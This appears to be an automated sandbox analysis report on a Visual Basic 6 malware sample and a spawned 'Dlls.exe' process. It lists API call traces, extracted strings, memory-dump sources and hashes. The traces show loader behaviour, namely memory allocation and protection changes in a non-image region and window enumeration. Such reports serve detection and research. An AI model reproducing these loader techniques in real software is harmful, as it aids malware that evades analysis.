__vbaFreeStr.MSVBVM60(00402424,00000000,00402418,00000002), ref: 0042B3F1
#690.MSVBVM60(forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B413
#541.MSVBVM60(?,17:17:17,forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B421
__vbaStrVarMove.MSVBVM60(?,?,17:17:17,forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B42A
__vbaStrMove.MSVBVM60(?,?,17:17:17,forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B434
__vbaFreeVar.MSVBVM60(?,?,17:17:17,forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B43C
__vbaNew2.MSVBVM60(0040238C,0042F5B4,?,?,17:17:17,forureningsforebyggendes,Sikkerhedkopiering6,Jaimie6,EVADNE,00402424,00000000,00402418,00000002), ref: 0042B453
__vbaHresultCheckObj.MSVBVM60(00000000,021FEDB4,0040237C,0000001C), ref: 0042B477
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024E0,00000064), ref: 0042B49C
__vbaFreeObj.MSVBVM60(00000000,?,004024E0,00000064), ref: 0042B4A4
__vbaNew2.MSVBVM60(00401BAC,0042F010,00402424,00000000,00402418,00000002), ref: 0042B4BC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042B4D4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004023AC,000001B0), ref: 0042B510
__vbaFreeObj.MSVBVM60(00000000,00000000,004023AC,000001B0), ref: 0042B518
__vbaFreeStr.MSVBVM60(0042B54D), ref: 0042B547

Strings

X4, xrefs: 0042B51D
17:17:17, xrefs: 0042B418
forureningsforebyggendes, xrefs: 0042B40E
EVADNE, xrefs: 0042B3FF
Sikkerhedkopiering6, xrefs: 0042B409
Jaimie6, xrefs: 0042B404

Memory Dump Source

Source File: 00000002.00000002.137585002982.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.137584971419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.137585255626.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.137585297106.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$New2$#512#541#690
String ID: 17:17:17$EVADNE$Jaimie6$Sikkerhedkopiering6$X4$forureningsforebyggendes
API String ID: 509014564-2754207988
Opcode ID: 47e6c6a805af6dbf2c908de4f67353a3b2e1b48b0ce6aee00380844cad00a5c8
Instruction ID: 7c8b6068a66c8e573243ee70223de2b6d94009e2cb81fa34890380416baed3ae
Opcode Fuzzy Hash: 47e6c6a805af6dbf2c908de4f67353a3b2e1b48b0ce6aee00380844cad00a5c8
Instruction Fuzzy Hash: 8B418371A40214ABDB10FFA5DD8AE9E77B8EF54704FA0403BF501B71E2D7BC690586A8

Uniqueness

Uniqueness Score: -1.00%

Function 0042B6C1, Relevance: 28.7, APIs: 19, Instructions: 151COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 0042B71F
#563.MSVBVM60(?), ref: 0042B728
__vbaFreeVar.MSVBVM60(?), ref: 0042B73C
#611.MSVBVM60(?), ref: 0042B74A
__vbaStrMove.MSVBVM60(?), ref: 0042B754
#539.MSVBVM60(?,00000001,00000001,00000001,?), ref: 0042B763
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001,?), ref: 0042B76C
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001,?), ref: 0042B776
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001,?), ref: 0042B77E
#685.MSVBVM60(?,?,00000001,00000001,00000001,?), ref: 0042B783
__vbaObjSet.MSVBVM60(?,00000000,?,?,00000001,00000001,00000001,?), ref: 0042B78D
__vbaNew2.MSVBVM60(00401BAC,0042F010,?,00000000,?,?,00000001,00000001,00000001,?), ref: 0042B7C7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042B7DF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402508,000001E8), ref: 0042B808
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402518,00000044), ref: 0042B83A
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0042B849
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000002,?,?), ref: 0042B860
__vbaFreeStr.MSVBVM60(0042B8AA,?), ref: 0042B89C
__vbaFreeStr.MSVBVM60(0042B8AA,?), ref: 0042B8A4

Memory Dump Source

Source File: 00000002.00000002.137585002982.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.137584971419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.137585255626.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.137585297106.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresultList$#539#563#611#685New2
String ID:
API String ID: 401280197-0
Opcode ID: ec5fa6d15dd9cd53944810b568695504963184bd6d959c4d517d60b65d027325
Instruction ID: baf0d10eb9a5b419a223cc6c95f14da7fa83309385c4ed17ffde0e0f59fd9816
Opcode Fuzzy Hash: ec5fa6d15dd9cd53944810b568695504963184bd6d959c4d517d60b65d027325
Instruction Fuzzy Hash: BD5119B1A10228ABDB14EBD4DC86EEEB7B8BF08704F54012FF505F7191DB7859058B98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mU9H96igb3.exe PID: 6380 Parent PID: 4448 mU9H96igb3.exeCOMMON

Executed Functions

Function 00581BCE, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 566COMMON

Download Yara Rule

Strings

Gf8, xrefs: 0057C7D9
Z5, xrefs: 00583D6F

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: Gf8$Z5
API String ID: 3389902171-947967345
Opcode ID: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction ID: c6c960dc5310d0beea88e0b8b0badbfc3d5daf5f9d75bba529208680e5522496
Opcode Fuzzy Hash: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction Fuzzy Hash: 5832D3715083858FDB35DF38C8987EA7FA2BF56310F5982AADC999F296D3308641C712

Uniqueness

Uniqueness Score: -1.00%

Function 0057557A, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0057C2D8: LoadLibraryA.KERNEL32(D7EA1F99,1AB02117,?,00008769,?,0057EB7C,?,0057CA52,1AB02117), ref: 0057D310

NtAllocateVirtualMemory.NTDLL ref: 00575BAE

Strings

_, xrefs: 00576024

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: _
API String ID: 2616484454-701932520
Opcode ID: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction ID: 279c0dbdecb7716e084ca0d5a795df40d0f66d2cf0b5fdb82c379f92cd0253c8
Opcode Fuzzy Hash: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction Fuzzy Hash: 99A1FB31E086869FDB16EF3CDCCDEE67BA6AF41714F45828CA8875B04AE3714516C782

Uniqueness

Uniqueness Score: -1.00%

Function 0058474A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

1bU, xrefs: 00584B4E

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 1bU
API String ID: 0-1111237263
Opcode ID: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction ID: 95ac01ba15637154fb95b604aa115dd932f09398d143d3e0366c5a0cf2c14552
Opcode Fuzzy Hash: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction Fuzzy Hash: 88713471A04A48CFDF35EE24C99C7EA3BB2BF95310F61461ACC4AAF214D3318A45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0057ECDD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(D7EA1F99,1AB02117,?,00008769,?,0057EB7C,?,0057CA52,1AB02117), ref: 0057D310

Strings

Gf8, xrefs: 0057C7D9

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction ID: 9da73af8162d02fbc084959978cfbeed09a152287dce85555fd64047fac297aa
Opcode Fuzzy Hash: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction Fuzzy Hash: 523146755082888BDF70DE35ED482EA3EB2BFE4310FA5C92E9C4D5B204D3715A42B792

Uniqueness

Uniqueness Score: -1.00%

Function 00566970, Relevance: 1.7, APIs: 1, Instructions: 210nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 00566972

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: bbdd4184b9c6f43cbd83bf701d028af3b6d0c7a13e1de9c3c7e4e2ac0d3b6566
Instruction ID: c2d68468108bc97e0435b9b1fb2777c07f99e991e087991684f2cfe9c1543061
Opcode Fuzzy Hash: bbdd4184b9c6f43cbd83bf701d028af3b6d0c7a13e1de9c3c7e4e2ac0d3b6566
Instruction Fuzzy Hash: BD81C732E185868FDB56FF3CE8CCDA67FA6AE42714F1482CCA4834B44BD236451BC652

Uniqueness

Uniqueness Score: -1.00%

Function 00586E0F, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00587100

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d597ffac7ff54cdbac2dc824901331cbe89459a7ad892a5d97136f7bd529ff01
Instruction ID: dea66bb45262ed014a178b1f9b0df8e05a18d9dba7521c9e3742e43e38991e2d
Opcode Fuzzy Hash: d597ffac7ff54cdbac2dc824901331cbe89459a7ad892a5d97136f7bd529ff01
Instruction Fuzzy Hash: 9E112BB06043018FDB549E64898AF6A3A56FF8A324F2583A5AD46EB1B3C735C881C721

Uniqueness

Uniqueness Score: -1.00%

Function 00584084, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 00584233

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction ID: 490b3ca9e6e85a12b57690301aafc7f88f6a0b65009f90a58abe5948c7f5c734
Opcode Fuzzy Hash: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction Fuzzy Hash: F51155714047949FDB34CF68CC986E6BBA4FF89320F44C1AEDC866B245D3705A02CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00574B8B, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?), ref: 00574EB1

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction ID: a55f2e39629da76126ebf854985986a406950a6dc3b1017920c77fee84382eb5
Opcode Fuzzy Hash: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction Fuzzy Hash: BA110136988344DFC7986EB4D9456EABBA2FF59390F42880DDCCA53514D3340A92CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0056267D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 00562687

Strings

E, xrefs: 005627D4
Guc, xrefs: 00562694

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: Guc$E
API String ID: 1129996299-111232842
Opcode ID: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction ID: c4a7ca92730f4e0d7bb155835fa0d19564d059fd2087c347d72d8f8c751b5a18
Opcode Fuzzy Hash: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction Fuzzy Hash: E171B532E09A858FDB56EF7CD8CDDD6BBA5AE42724F1482CCD4824B44BE232451BC652

Uniqueness

Uniqueness Score: -1.00%

Function 0057C2D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(D7EA1F99,1AB02117,?,00008769,?,0057EB7C,?,0057CA52,1AB02117), ref: 0057D310

Strings

Gf8, xrefs: 0057C7D9

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction ID: 035229f8c99428b44c26695dc977b51f50e39b79c550c5770c8edc15aee99d94
Opcode Fuzzy Hash: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction Fuzzy Hash: 6521D171108288CBDF749E28ED496ED3E76BF94310F60992AAC4E9B201D7305A41AB53

Uniqueness

Uniqueness Score: -1.00%

Function 0057742D, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00564924), ref: 005781A2

Memory Dump Source

Source File: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction ID: 7ca36712469e8a1f25caaf87be14873fe3167984fa77d065f5722fdb7364c839
Opcode Fuzzy Hash: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction Fuzzy Hash: 65C0803858155D54D94072D4624DA741D10BFD43C1FD8C4256D1D1790FCF34C4057B51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Dlls.exe PID: 2916 Parent PID: 6504 Dlls.exeCOMMON

Executed Functions

Function 02C31BCE, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 566COMMON

Download Yara Rule

Strings

Z5, xrefs: 02C33D6F
Gf8, xrefs: 02C2C7D9

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: Gf8$Z5
API String ID: 3389902171-947967345
Opcode ID: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction ID: b705cf0f80237fdd977708231a49555001e7a5d899dbbb488cfe0121c55a6544
Opcode Fuzzy Hash: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction Fuzzy Hash: 2B32D5315083C58FDF36CF38C8987DA7BA2AF56310F4586AACC998F296D7308645C752

Uniqueness

Uniqueness Score: -1.00%

Function 02C27574, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 800COMMON

Download Yara Rule

Strings

QJQ, xrefs: 02C21C83

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: QJQ
API String ID: 2616484454-1123671965
Opcode ID: 27880fdc75ef78cb1fa9f13f86d5ee5d6f60d9520b781fe0bd13b7b96354e350
Instruction ID: f9fc63ae225d019a5b7bbf92e798f739cdcc44c245c494c5e460e38f658cbafd
Opcode Fuzzy Hash: 27880fdc75ef78cb1fa9f13f86d5ee5d6f60d9520b781fe0bd13b7b96354e350
Instruction Fuzzy Hash: 747211B1604399DFDB749F28CD517EA7BA2FF55340F51812ADC8A9B210DB309A45CF82

Uniqueness

Uniqueness Score: -1.00%

Function 02C3130A, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 790COMMON

Download Yara Rule

Strings

QJQ, xrefs: 02C21C83

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: QJQ
API String ID: 0-1123671965
Opcode ID: b3cd7cd473863d37b7ff1da80a47dd83c71829eccc8b3f7f843d6123a7817915
Instruction ID: d2b7f3dd2ae8b6c8469d6f8b98068835a874613257b9f6a3fc3666ac603fa523
Opcode Fuzzy Hash: b3cd7cd473863d37b7ff1da80a47dd83c71829eccc8b3f7f843d6123a7817915
Instruction Fuzzy Hash: 3D7231B2A04399DFDB749F28CD417EA7BB2FF55340F05812ADC8A9B210D7705A85CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02C2087E, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 739COMMON

Download Yara Rule

Strings

QJQ, xrefs: 02C21C83

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: QJQ
API String ID: 1029625771-1123671965
Opcode ID: 57c5091d0ce1ba3a043f4033ec4d7566b269931cad9ecac00d8f72e84367355d
Instruction ID: 57e700c3fd2513bcf28a71140d01fdb98c21680a3f2209e5a2d7403b70e4ad8b
Opcode Fuzzy Hash: 57c5091d0ce1ba3a043f4033ec4d7566b269931cad9ecac00d8f72e84367355d
Instruction Fuzzy Hash: 066220B2604399DFDB749F38CD517EA7BA2FF55340F05812ADC8A9B210DB705A85CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02C2557A, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02C2C2D8: LoadLibraryA.KERNELBASE(D7EA1F99), ref: 02C2D310

NtAllocateVirtualMemory.NTDLL ref: 02C25BAE

Strings

_, xrefs: 02C26024

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: _
API String ID: 2616484454-701932520
Opcode ID: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction ID: d2f6d64bb92340d03d5004a4e0892af063907ad56952eb4a39be5e1e8ab322f0
Opcode Fuzzy Hash: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction Fuzzy Hash: AEA1F935E096869FDB16EF3CDCCCEE6B7A6AF41724F45428CE8825B04AD371451AC782

Uniqueness

Uniqueness Score: -1.00%

Function 02C3474A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

1bU, xrefs: 02C34B4E

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 1bU
API String ID: 0-1111237263
Opcode ID: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction ID: a41d3735fc58e34aa85648de4e22824715ca4c720b73438ab8fc5f7a7350d2ab
Opcode Fuzzy Hash: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction Fuzzy Hash: D5712571A04648CFDF3ADE25C9997EA37B2BF89310F51491ACC4A9F254C3358B85CB86

Uniqueness

Uniqueness Score: -1.00%

Function 02C2ECDD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D7EA1F99), ref: 02C2D310

Strings

Gf8, xrefs: 02C2C7D9

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction ID: cf622ade3fe628db47bb6476cdf903940ac06104eccb98b866d7fa826ca06238
Opcode Fuzzy Hash: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction Fuzzy Hash: 983128755082A48BDF30DE36CD443EE3A62AFA4350F56412BDC4E67244CB715B49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C34084, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 02C34233

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction ID: 7f65cdecc02373987e8d7c0603ccac2efae839f476564bb0cb65a0c12c330176
Opcode Fuzzy Hash: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction Fuzzy Hash: 831132754043A49FDB34CF288C956E6BBA4EF89320F44819EDC866B245D3309A02CB15

Uniqueness

Uniqueness Score: -1.00%

Function 02C24B8B, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 02C24EB1

Memory Dump Source

Source File: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, Offset: 02C10000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction ID: 5d31b659e3321146512cf5517bcd4ec35b02d3cc9aa412f408c3daa94872e877
Opcode Fuzzy Hash: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction Fuzzy Hash: 1B110136988344DFC7986EA4D9456EABBA2FF69390F42480DDCC653514D3340A92CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0042AC3E, Relevance: 75.7, APIs: 42, Strings: 1, Instructions: 403COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0042AC5C
#526.MSVBVM60(?,00000001,?,?,?,?,004011F6), ref: 0042ACA6
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0042ACCA
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0042ACD9
__vbaNew2.MSVBVM60(0040238C,0042F5B4,00008008,?), ref: 0042AD07
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040237C,00000014,?,?,?,?,?,?,?,?,?,?,?,00008008), ref: 0042AD69
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040239C,000000B8,?,?,?,?,?,?,?,?,?,?,?,00008008), ref: 0042ADC8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0042ADEA
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 0042AE00
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AE09
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AE13
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042AE1B
__vbaNew2.MSVBVM60(00401BAC,0042F010,?,?,00000001,00000001,00000001), ref: 0042AE3A
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008), ref: 0042AE73
__vbaHresultCheckObj.MSVBVM60(00000000,?,004023AC,00000110), ref: 0042AEBD
#532.MSVBVM60(?), ref: 0042AED4
__vbaFreeStr.MSVBVM60(?), ref: 0042AEDC
__vbaFreeObj.MSVBVM60(?), ref: 0042AEE4
__vbaBoolStr.MSVBVM60(True,00008008,?), ref: 0042AEF5
__vbaNew2.MSVBVM60(0040238C,0042F5B4,True,00008008,?), ref: 0042AF1E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040237C,00000014), ref: 0042AF80
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042AFDC
__vbaStrMove.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042B006
__vbaFreeObj.MSVBVM60(00000000,?,0040239C,000000E8), ref: 0042B00E
__vbaNew2.MSVBVM60(0040238C,0042F5B4), ref: 0042B02D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040237C,0000004C), ref: 0042B08F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042B0E1
__vbaFreeObj.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042B0F8
__vbaFpI4.MSVBVM60(00000000,?,004023CC,00000028), ref: 0042B10A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402228,00000064), ref: 0042B13C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402228,000002B4), ref: 0042B189
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402258,000006F8), ref: 0042B202
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402258,000006FC), ref: 0042B26B
__vbaOnError.MSVBVM60(000000FF), ref: 0042B288
__vbaVarMove.MSVBVM60(000000FF), ref: 0042B2BD
__vbaVarMove.MSVBVM60(000000FF), ref: 0042B2E6
__vbaVarIdiv.MSVBVM60(?,00000001,?,000000FF), ref: 0042B2FE
__vbaI4Var.MSVBVM60(00000000,?,00000001,?,000000FF), ref: 0042B304
__vbaFreeVar.MSVBVM60(0042B36B), ref: 0042B34D
__vbaFreeStr.MSVBVM60(0042B36B), ref: 0042B355
__vbaFreeStr.MSVBVM60(0042B36B), ref: 0042B35D
__vbaFreeVar.MSVBVM60(0042B36B), ref: 0042B365

Strings

True, xrefs: 0042AEF0

Memory Dump Source

Source File: 0000000F.00000002.138444333310.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.138444311128.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.138444555199.000000000042F000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.138444573282.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$Move$New2$#526#532#539BoolChkstkErrorIdiv
String ID: True
API String ID: 184932235-1573839795
Opcode ID: 341ca83123d38b726386d7389c190aaa7447f3007f861a4ac4cbfcb76b49abc8
Instruction ID: 69da50e412ea75792312df9287793d50fe00ff02032f5454a44a827cca003f6d
Opcode Fuzzy Hash: 341ca83123d38b726386d7389c190aaa7447f3007f861a4ac4cbfcb76b49abc8
Instruction Fuzzy Hash: 1D12E670A00228EFDB20DFA0DD45B9DBBB4BF05304F5080EAE509BB2A1D7785A99DF55

Uniqueness

Uniqueness Score: -1.00%

Function 0042B56A, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 0042B5C7
#557.MSVBVM60(?), ref: 0042B5D0
__vbaFreeVar.MSVBVM60(?), ref: 0042B5E6
#706.MSVBVM60(00000001,00000000,00000000,?), ref: 0042B5F8
__vbaStrMove.MSVBVM60(00000001,00000000,00000000,?), ref: 0042B602
__vbaNew2.MSVBVM60(0040238C,0042F5B4,00000001,00000000,00000000,?), ref: 0042B619
__vbaHresultCheckObj.MSVBVM60(00000000,021FEDB4,0040237C,00000014), ref: 0042B63D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040239C,00000070), ref: 0042B660
__vbaFreeObj.MSVBVM60(00000000,?,0040239C,00000070), ref: 0042B668
#568.MSVBVM60(00000050), ref: 0042B66F
__vbaFreeStr.MSVBVM60(0042B69C,?), ref: 0042B696

Strings

6/6/6, xrefs: 0042B5B9

Memory Dump Source

